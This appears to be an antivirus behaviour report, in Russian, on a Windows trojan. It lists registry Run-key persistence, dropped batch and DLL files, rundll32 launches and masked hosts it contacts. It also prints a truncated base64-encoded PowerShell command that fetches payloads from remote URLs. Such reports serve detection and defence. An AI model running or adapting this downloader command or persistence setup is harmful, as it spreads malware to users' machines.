Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'wnstxmwhfyd.wlj' = '%WINDIR%\SysWOW64\rundll32.exe "%LOCALAPPDATA%\Dfkpeuemhkjs\wnstxmwhfyd.wlj",AFdOuWi'
Вредоносные функции
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' /c %ALLUSERSPROFILE%\uwdhx.bat
Изменения в файловой системе
Создает следующие файлы
- %ALLUSERSPROFILE%\uwdhx.bat
- %ALLUSERSPROFILE%\683248970.dll
Перемещает следующие файлы
- %ALLUSERSPROFILE%\683248970.dll в %LOCALAPPDATA%\dfkpeuemhkjs\wnstxmwhfyd.wlj
Сетевая активность
TCP
Другие
- 'th####ndskill.com':443
- '17#.#04.227.98':443
UDP
- DNS ASK th####ndskill.com
Другое
Ищет следующие окна
- ClassName: 'OleMainThreadWndClass' WindowName: ''
Создает и запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c %ALLUSERSPROFILE%\uwdhx.bat' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc JABzAHQAcgBzAD0AIgBoAHQAdABwAHMAOgAvAC8AdABoAGUAdAByAGUAbgBkAHMAawBpAGwAbAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUASAAxADEALwAsAGgAdAB0AHAAOgAvAC8AYQBsAGkAdAB0AGwAZQBiAHIAYQB2AGUALgBj...
- '%WINDIR%\syswow64\rundll32.exe' %ALLUSERSPROFILE%\683248970.dll,f1989767434
- '%WINDIR%\syswow64\rundll32.exe' "%ALLUSERSPROFILE%\683248970.dll",DllRegisterServer
- '%WINDIR%\syswow64\rundll32.exe' "%LOCALAPPDATA%\Dfkpeuemhkjs\wnstxmwhfyd.wlj",GGNaGhUENVrJ
- '%WINDIR%\syswow64\rundll32.exe' "%LOCALAPPDATA%\Dfkpeuemhkjs\wnstxmwhfyd.wlj",DllRegisterServer
